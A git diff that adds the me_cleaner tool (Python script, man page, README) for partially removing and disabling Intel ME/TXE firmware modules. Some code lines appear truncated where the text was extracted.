decodeDir(self, integrity): + data = self.decodeData(integrity) + # Decode directory entries + for i in range(0, len(data), DIRECTORY_ENTRY_SIZE): + yield MFSDirectoryEntry(data[i:i + DIRECTORY_ENTRY_SIZE]) + + def __str__(self): + return f"File {self.id} has {len(self.data)} bytes (Chain: {self.chain})" + +class MFSDirectoryEntry: + FILE = 0 + DIR = 1 + + def __init__(self, data): + self.fileno, self.mode, self.uid, self.gid, self.salt, self.name = \ + struct.unpack("= 11) the ME subsystem and the firmware +structure have changed, requiring substantial changes in _me\_cleaner_. +The fundamental modules required for the correct boot are now four (`rbe`, +`kernel`, `syslib` and `bup`) and the minimum code size is ~300 kB of compressed +code (from the 2 MB of the non-AMT firmware and the 7 MB of the AMT one). + +On some boards the OEM firmware fails to boot without a valid Intel ME firmware; +in the other cases the system should work with minor inconveniences (like longer +boot times or warning messages) or without issues at all. + +Obviously, the features provided by Intel ME won't be functional anymore after +the modifications. + +## Documentation + +The detailed documentation about the working of _me\_cleaner_ can be found on +the page ["How does it work?" page]( +https://github.com/corna/me_cleaner/wiki/How-does-it-work%3F). + +Various guides and tutorials are available on the Internet, however a good +starting point is the ["How to apply me_cleaner" guide]( +https://github.com/corna/me_cleaner/wiki/How-to-apply-me_cleaner). diff --git a/blobs/t480/me_cleaner/description.md b/blobs/t480/me_cleaner/description.md new file mode 100644 index 00000000..d5de2d5c --- /dev/null +++ b/blobs/t480/me_cleaner/description.md @@ -0,0 +1,2 @@ +__[me_cleaner](https://github.com/corna/me_cleaner)__ - Tool for +partial deblobbing of Intel ME/TXE firmware images `Python` diff --git a/blobs/t480/me_cleaner/man/me_cleaner.1 b/blobs/t480/me_cleaner/man/me_cleaner.1 new file mode 100644 index 00000000..8edd2262 --- /dev/null +++ b/blobs/t480/me_cleaner/man/me_cleaner.1 @@ -0,0 +1,157 @@ +.TH me_cleaner 1 "JUNE 2018" +.SH me_cleaner +.PP +me_cleaner \- Tool for partial deblobbing of Intel ME/TXE firmware images +.SH SYNOPSIS +.PP +\fB\fCme_cleaner.py\fR [\-h] [\-v] [\-O output_file] [\-S | \-s] [\-r] [\-k] +[\-w whitelist | \-b blacklist] [\-d] [\-t] [\-c] [\-D output_descriptor] +[\-M output_me_image] \fIfile\fP +.SH DESCRIPTION +.PP +\fB\fCme_cleaner\fR is a tool able to disable parts of Intel ME/TXE by: +.RS +.IP \(bu 2 +removing most of the code from its firmware +.IP \(bu 2 +setting a special bit to force it to disable itself after the hardware +initialization +.RE +.PP +Using both the modes seems to be the most reliable way on many platforms. +.PP +The resulting modified firmware needs to be flashed (in most of the cases) with +an external programmer, often a dedicated SPI programmer or a Linux board with +a SPI master interface. +.PP +\fB\fCme_cleaner\fR works at least from Nehalem to Coffee Lake (for Intel ME) and on +Braswell/Cherry Trail (for Intel TXE), but may work as well on newer or +different architectures. +.PP +While \fB\fCme_cleaner\fR have been tested on a great number of platforms, fiddling +with the Intel ME/TXE firmware is \fIvery dangerous\fP and can easily lead to a +dead PC. +.PP +\fIYOU HAVE BEEN WARNED.\fP +.SH POSITIONAL ARGUMENTS +.TP +\fB\fCfile\fR +ME/TXE image or full dump. +.SH OPTIONAL ARGUMENTS +.TP +\fB\fC\-h\fR, \fB\fC\-\-help\fR +Show the help message and exit. +.TP +\fB\fC\-v\fR, \fB\fC\-\-version\fR +Show program's version number and exit. +.TP +\fB\fC\-O\fR, \fB\fC\-\-output\fR +Save the modified image in a separate file, instead of modifying the +original file. +.TP +\fB\fC\-S\fR, \fB\fC\-\-soft\-disable\fR +In addition to the usual operations on the ME/TXE firmware, set the +MeAltDisable bit or the HAP bit to ask Intel ME/TXE to disable itself after +the hardware initialization (requires a full dump). +.TP +\fB\fC\-s\fR, \fB\fC\-\-soft\-disable\-only\fR +Instead of the usual operations on the ME/TXE firmware, just set the +MeAltDisable bit or the HAP bit to ask Intel ME/TXE to disable itself after +the hardware initialization (requires a full dump). +.TP +\fB\fC\-r\fR, \fB\fC\-\-relocate\fR +Relocate the FTPR partition to the top of the ME region to save even more +space. +.TP +\fB\fC\-t\fR, \fB\fC\-\-truncate\fR +Truncate the empty part of the firmware (requires a separated ME/TXE image or +\fB\fC\-\-extract\-me\fR). +.TP +\fB\fC\-k\fR, \fB\fC\-\-keep\-modules\fR +Don't remove the FTPR modules, even when possible. +.TP +\fB\fC\-w\fR, \fB\fC\-\-whitelist\fR +Comma separated list of additional partitions to keep in the final image. +This can be used to specify the MFS partition for example, which stores PCIe +and clock settings. +.TP +\fB\fC\-b\fR, \fB\fC\-\-blacklist\fR +Comma separated list of partitions to remove from the image. This option +overrides the default removal list. +.TP +\fB\fC\-d\fR, \fB\fC\-\-descriptor\fR +Remove the ME/TXE Read/Write permissions to the other regions on the flash +from the Intel Flash Descriptor (requires a full dump). +.TP +\fB\fC\-D\fR, \fB\fC\-\-extract\-descriptor\fR +Extract the flash descriptor from a full dump; when used with \fB\fC\-\-truncate\fR +save a descriptor with adjusted regions start and end. +.TP +\fB\fC\-M\fR, \fB\fC\-\-extract\-me\fR +Extract the ME firmware from a full dump; when used with \fB\fC\-\-truncate\fR save a +truncated ME/TXE image. +.TP +\fB\fC\-c\fR, \fB\fC\-\-check\fR +Verify the integrity of the fundamental parts of the firmware and exit. +.SH SUPPORTED PLATFORMS +.PP +Currently \fB\fCme_cleaner\fR has been tested on the following platforms: +.TS +allbox; +cb cb cb cb +c c c c +c c c c +c c c c +c c c c +c c c c +c c c c +c c c c +c c c c +. +PCH CPU ME SKU +Ibex Peak Nehalem/Westmere 6.0 Ignition +Ibex Peak Nehalem/Westmere 6.x 1.5/5 MB +Cougar Point Sandy Bridge 7.x 1.5/5 MB +Panther Point Ivy Bridge 8.x 1.5/5 MB +Lynx/Wildcat Point Haswell/Broadwell 9.x 1.5/5 MB +Wildcat Point LP Broadwell Mobile 10.0 1.5/5 MB +Sunrise Point Skylake/Kabylake 11.x CON/COR +Union Point Kabylake 11.x CON/COR +.TE +.TS +allbox; +cb cb cb +c c c +. +SoC TXE SKU +Braswell/Cherry Trail 2.x 1.375 MB +.TE +.PP +All the reports are available on the project's GitHub page \[la]https://github.com/corna/me_cleaner/issues/3\[ra]\&. +.SH EXAMPLES +.PP +Check whether the provided image has a valid structure and signature: +.IP +\fB\fCme_cleaner.py \-c dumped_firmware.bin\fR +.PP +Remove most of the Intel ME firmware modules but don't set the HAP/AltMeDisable +bit: +.IP +\fB\fCme_cleaner.py \-S \-O modified_me_firmware.bin dumped_firmware.bin\fR +.PP +Remove most of the Intel ME firmware modules and set the HAP/AltMeDisable bit, +disable the Read/Write access of Intel ME to the other flash region, then +relocate the code to the top of the image and truncate it, extracting a modified +descriptor and ME image: +.IP +\fB\fCme_cleaner.py \-S \-r \-t \-d \-D ifd_shrinked.bin \-M me_shrinked.bin \-O modified_firmware.bin full_dumped_firmware.bin\fR +.SH BUGS +.PP +Bugs should be reported on the project's GitHub page \[la]https://github.com/corna/me_cleaner\[ra]\&. +.SH AUTHOR +.PP +Nicola Corna \[la]nicola@corna.info\[ra] +.SH SEE ALSO +.PP +.BR flashrom (8), +me_cleaner's Wiki \[la]https://github.com/corna/me_cleaner/wiki\[ra] diff --git a/blobs/t480/me_cleaner/me_cleaner.py b/blobs/t480/me_cleaner/me_cleaner.py new file mode 100755 index 00000000..fae5e567 --- /dev/null +++ b/blobs/t480/me_cleaner/me_cleaner.py @@ -0,0 +1,884 @@ +#!/usr/bin/env python +# me_cleaner - Tool for partial deblobbing of Intel ME/TXE firmware images +# SPDX-License-Identifier: GPL-3.0-or-later + +from __future__ import division, print_function + +import argparse +import binascii +import hashlib +import itertools +import shutil +import sys +from struct import pack, unpack + + +min_ftpr_offset = 0x400 +spared_blocks = 4 +unremovable_modules = ("ROMP", "BUP") +unremovable_modules_me11 = ("rbe", "kernel", "syslib", "bup") +unremovable_partitions = ("FTPR",) + +pubkeys_md5 = { + "763e59ebe235e45a197a5b1a378dfa04": ("ME", ("6.x.x.x",)), + "3a98c847d609c253e145bd36512629cb": ("ME", ("6.0.50.x",)), + "0903fc25b0f6bed8c4ed724aca02124c": ("ME", ("7.x.x.x", "8.x.x.x")), + "2011ae6df87c40fba09e3f20459b1ce0": ("ME", ("9.0.x.x", "9.1.x.x")), + "e8427c5691cf8b56bc5cdd82746957ed": ("ME", ("9.5.x.x", "10.x.x.x")), + "986a78e481f185f7d54e4af06eb413f6": ("ME", ("11.x.x.x",)), + "bda0b6bb8ca0bf0cac55ac4c4d55e0f2": ("TXE", ("1.x.x.x",)), + "b726a2ab9cd59d4e62fe2bead7cf6997": ("TXE", ("1.x.x.x",)), + "0633d7f951a3e7968ae7460861be9cfb": ("TXE", ("2.x.x.x",)), + "1d0a36e9f5881540d8e4b382c6612ed8": ("TXE", ("3.x.x.x",)), + "be900fef868f770d266b1fc67e887e69": ("SPS", ("2.x.x.x",)), + "4622e3f2cb212a89c90a4de3336d88d2": ("SPS", ("3.x.x.x",)), + "31ef3d950eac99d18e187375c0764ca4": ("SPS", ("4.x.x.x",)) +} + + +class OutOfRegionException(Exception): + pass + + +class RegionFile: + def __init__(self, f, region_start, region_end): + self.f = f + self.region_start = region_start + self.region_end = region_end + + def read(self, n): + if f.tell() + n <= self.region_end: + return self.f.read(n) + else: + raise OutOfRegionException() + + def readinto(self, b): + if f.tell() + len(b) <= self.region_end: + return self.f.readinto(b) + else: + raise OutOfRegionException() + + def seek(self, offset): + if self.region_start + offset <= self.region_end: + return self.f.seek(self.region_start + offset) + else: + raise OutOfRegionException() + + def write_to(self, offset, data): + if self.region_start + offset + len(data) <= self.region_end: + self.f.seek(self.region_start + offset) + return self.f.write(data) + else: + raise OutOfRegionException() + + def fill_range(self, start, end, fill): + if self.region_start + end <= self.region_end: + if start < end: + block = fill * 4096 + self.f.seek(self.region_start + start) + self.f.writelines(itertools.repeat(block, + (end - start) // 4096)) + self.f.write(block[:(end - start) % 4096]) + else: + raise OutOfRegionException() + + def fill_all(self, fill): + self.fill_range(0, self.region_end - self.region_start, fill) + + def move_range(self, offset_from, size, offset_to, fill): + if self.region_start + offset_from + size <= self.region_end and \ + self.region_start + offset_to + size <= self.region_end: + for i in range(0, size, 4096): + self.f.seek(self.region_start + offset_from + i, 0) + block = self.f.read(min(size - i, 4096)) + self.f.seek(self.region_start + offset_from + i, 0) + self.f.write(fill * len(block)) + self.f.seek(self.region_start + offset_to + i, 0) + self.f.write(block) + else: + raise OutOfRegionException() + + def save(self, filename, size): + if self.region_start + size <= self.region_end: + self.f.seek(self.region_start) + copyf = open(filename, "w+b") + for i in range(0, size, 4096): + copyf.write(self.f.read(min(size - i, 4096))) + return copyf + else: + raise OutOfRegionException() + + +def get_chunks_offsets(llut): + chunk_count = unpack("> 4) & 7 + + print(" {:<16} ({:<7}, ".format(name, comp_str[comp_type]), end="") + + if comp_type == 0x00 or comp_type == 0x02: + print("0x{:06x} - 0x{:06x} ): " + .format(offset, offset + size), end="") + + if name in unremovable_modules: + end_addr = max(end_addr, offset + size) + print("NOT removed, essential") + else: + end = min(offset + size, me_end) + f.fill_range(offset, end, b"\xff") + print("removed") + + elif comp_type == 0x01: + if not chunks_offsets: + f.seek(offset) + llut = f.read(4) + if llut == b"LLUT": + llut += f.read(0x3c) + + chunk_count = unpack(" removable_chunk[0]: + end = min(removable_chunk[1], me_end) + f.fill_range(removable_chunk[0], end, b"\xff") + + end_addr = max(end_addr, + max(unremovable_huff_chunks, key=lambda x: x[1])[1]) + + return end_addr + + +def check_partition_signature(f, offset): + f.seek(offset) + header = f.read(0x80) + modulus = int(binascii.hexlify(f.read(0x100)[::-1]), 16) + public_exponent = unpack("> 4) & 7 == 0x01: + llut_start = unpack("> 25 + + modules.append((name, offset, comp_type)) + + modules.sort(key=lambda x: x[1]) + + for i in range(0, module_count): + name = modules[i][0] + offset = partition_offset + modules[i][1] + end = partition_offset + modules[i + 1][1] + removed = False + + if name.endswith(".man") or name.endswith(".met"): + compression = "uncompressed" + else: + compression = comp_str[modules[i][2]] + + print(" {:<12} ({:<12}, 0x{:06x} - 0x{:06x}): " + .format(name, compression, offset, end), end="") + + if name.endswith(".man"): + print("NOT removed, partition manif.") + elif name.endswith(".met"): + print("NOT removed, module metadata") + elif any(name.startswith(m) for m in unremovable_modules_me11): + print("NOT removed, essential") + else: + removed = True + f.fill_range(offset, min(end, me_end), b"\xff") + print("removed") + + if not removed: + end_data = max(end_data, end) + + if relocate: + new_offset = relocate_partition(f, me_end, 0x30, min_offset, []) + end_data += new_offset - partition_offset + partition_offset = new_offset + + return end_data, partition_offset + + +def check_mn2_tag(f, offset): + f.seek(offset + 0x1c) + tag = f.read(4) + if tag != b"$MN2": + sys.exit("Wrong FTPR manifest tag ({}), this image may be corrupted" + .format(tag)) + + +def flreg_to_start_end(flreg): + return (flreg & 0x7fff) << 12, (flreg >> 4 & 0x7fff000 | 0xfff) + 1 + + +def start_end_to_flreg(start, end): + return (start & 0x7fff000) >> 12 | ((end - 1) & 0x7fff000) << 4 + + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description="Tool to remove as much code " + "as possible from Intel ME/TXE firmware " + "images") + softdis = parser.add_mutually_exclusive_group() + bw_list = parser.add_mutually_exclusive_group() + + parser.add_argument("-v", "--version", action="version", + version="%(prog)s 1.2") + + parser.add_argument("file", help="ME/TXE image or full dump") + parser.add_argument("-O", "--output", metavar='output_file', help="save " + "the modified image in a separate file, instead of " + "modifying the original file") + softdis.add_argument("-S", "--soft-disable", help="in addition to the " + "usual operations on the ME/TXE firmware, set the " + "MeAltDisable bit or the HAP bit to ask Intel ME/TXE " + "to disable itself after the hardware initialization " + "(requires a full dump)", action="store_true") + softdis.add_argument("-s", "--soft-disable-only", help="instead of the " + "usual operations on the ME/TXE firmware, just set " + "the MeAltDisable bit or the HAP bit to ask Intel " + "ME/TXE to disable itself after the hardware " + "initialization (requires a full dump)", + action="store_true") + parser.add_argument("-r", "--relocate", help="relocate the FTPR partition " + "to the top of the ME region to save even more space", + action="store_true") + parser.add_argument("-t", "--truncate", help="truncate the empty part of " + "the firmware (requires a separated ME/TXE image or " + "--extract-me)", action="store_true") + parser.add_argument("-k", "--keep-modules", help="don't remove the FTPR " + "modules, even when possible", action="store_true") + bw_list.add_argument("-w", "--whitelist", metavar="whitelist", + help="Comma separated list of additional partitions " + "to keep in the final image. This can be used to " + "specify the MFS partition for example, which stores " + "PCIe and clock settings.") + bw_list.add_argument("-b", "--blacklist", metavar="blacklist", + help="Comma separated list of partitions to remove " + "from the image. This option overrides the default " + "removal list.") + parser.add_argument("-d", "--descriptor", help="remove the ME/TXE " + "Read/Write permissions to the other regions on the " + "flash from the Intel Flash Descriptor (requires a " + "full dump)", action="store_true") + parser.add_argument("-D", "--extract-descriptor", + metavar='output_descriptor', help="extract the flash " + "descriptor from a full dump; when used with " + "--truncate save a descriptor with adjusted regions " + "start and end") + parser.add_argument("-M", "--extract-me", metavar='output_me_image', + help="extract the ME firmware from a full dump; when " + "used with --truncate save a truncated ME/TXE image") + parser.add_argument("-c", "--check", help="verify the integrity of the " + "fundamental parts of the firmware and exit", + action="store_true") + + args = parser.parse_args() + + if args.check and (args.soft_disable_only or args.soft_disable or + args.relocate or args.descriptor or args.truncate or args.output): + sys.exit("-c can't be used with -S, -s, -r, -d, -t or -O") + + if args.soft_disable_only and (args.relocate or args.truncate): + sys.exit("-s can't be used with -r or -t") + + if (args.whitelist or args.blacklist) and args.relocate: + sys.exit("Relocation is not yet supported with custom whitelist or " + "blacklist") + + f = open(args.file, "rb" if args.check or args.output else "r+b") + f.seek(0x10) + magic = f.read(4) + + if magic == b"$FPT": + print("ME/TXE image detected") + + if args.descriptor or args.extract_descriptor or args.extract_me or \ + args.soft_disable or args.soft_disable_only: + sys.exit("-d, -D, -M, -S and -s require a full dump") + + f.seek(0, 2) + me_start = 0 + me_end = f.tell() + mef = RegionFile(f, me_start, me_end) + + elif magic == b"\x5a\xa5\xf0\x0f": + print("Full image detected") + + if args.truncate and not args.extract_me: + sys.exit("-t requires a separated ME/TXE image (or --extract-me)") + + f.seek(0x14) + flmap0, flmap1 = unpack("> 12 & 0xff0 + fmba = (flmap1 & 0xff) << 4 + fpsba = flmap1 >> 12 & 0xff0 + + f.seek(frba) + flreg = unpack("= me_end: + sys.exit("The ME/TXE region in this image has been disabled") + + mef = RegionFile(f, me_start, me_end) + + mef.seek(0x10) + if mef.read(4) != b"$FPT": + sys.exit("The ME/TXE region is corrupted or missing") + + print("The ME/TXE region goes from {:#x} to {:#x}" + .format(me_start, me_end)) + else: + sys.exit("Unknown image") + + end_addr = me_end + + print("Found FPT header at {:#x}".format(mef.region_start + 0x10)) + + mef.seek(0x14) + entries = unpack("= 0: + check_mn2_tag(mef, ftpr_offset + ftpr_mn2_offset) + print("Found FTPR manifest at {:#x}" + .format(ftpr_offset + ftpr_mn2_offset)) + else: + sys.exit("Can't find the manifest of the FTPR partition") + + else: + check_mn2_tag(mef, ftpr_offset) + me11 = False + ftpr_mn2_offset = 0 + + mef.seek(ftpr_offset + ftpr_mn2_offset + 0x24) + version = unpack("= 6: + variant = "ME" + else: + variant = "TXE" + print("WARNING Unknown public key {}\n" + " Assuming Intel {}\n" + " Please report this warning to the project's maintainer!" + .format(pubkey_md5, variant)) + + if not args.check and args.output: + f.close() + shutil.copy(args.file, args.output) + f = open(args.output, "r+b") + + mef = RegionFile(f, me_start, me_end) + + if me_start > 0: + fdf = RegionFile(f, fd_start, fd_end) + + if me11: + fdf.seek(fpsba) + pchstrp0 = unpack(" me_end: + print(" {:<4} ({:^24}, 0x{:08x} total bytes): nothing to " + "remove" + .format(part_name, "no data here", part_length)) + else: + print(" {:<4} (0x{:08x} - 0x{:09x}, 0x{:08x} total bytes): " + .format(part_name, part_start, part_end, part_length), + end="") + if part_name in whitelist or (blacklist and + part_name not in blacklist): + unremovable_part_fpt += partition + if part_name != "FTPR": + extra_part_end = max(extra_part_end, part_end) + print("NOT removed") + else: + mef.fill_range(part_start, part_end, b"\xff") + print("removed") + + print("Removing partition entries in FPT...") + mef.write_to(0x30, unremovable_part_fpt) + mef.write_to(0x14, + pack("= 11 (except for + # 0x1b, the checksum itself). In other words, the sum of those + # bytes must be always 0x00. + mef.write_to(0x1b, pack("B", checksum)) + + print("Reading FTPR modules list...") + if me11: + end_addr, ftpr_offset = \ + check_and_remove_modules_me11(mef, me_end, + ftpr_offset, ftpr_length, + min_ftpr_offset, + args.relocate, + args.keep_modules) + else: + end_addr, ftpr_offset = \ + check_and_remove_modules(mef, me_end, ftpr_offset, + min_ftpr_offset, args.relocate, + args.keep_modules) + + if end_addr > 0: + end_addr = max(end_addr, extra_part_end) + end_addr = (end_addr // 0x1000 + 1) * 0x1000 + end_addr += spared_blocks * 0x1000 + + print("The ME minimum size should be {0} bytes " + "({0:#x} bytes)".format(end_addr)) + + if me_start > 0: + print("The ME region can be reduced up to:\n" + " {:08x}:{:08x} me" + .format(me_start, me_start + end_addr - 1)) + elif args.truncate: + print("Truncating file at {:#x}...".format(end_addr)) + f.truncate(end_addr) + + if args.soft_disable or args.soft_disable_only: + if me11: + print("Setting the HAP bit in PCHSTRP0 to disable Intel ME...") + pchstrp0 |= (1 << 16) + fdf.write_to(fpsba, pack(" {:08x}:{:08x} me" + .format(me_start, me_end - 1, + me_start, me_start + end_addr - 1)) + print(" {:08x}:{:08x} bios --> {:08x}:{:08x} bios" + .format(bios_start, bios_end - 1, + me_start + end_addr, bios_end - 1)) + + flreg1 = start_end_to_flreg(me_start + end_addr, bios_end) + flreg2 = start_end_to_flreg(me_start, me_start + end_addr) + + fdf_copy.seek(frba + 0x4) + fdf_copy.write(pack("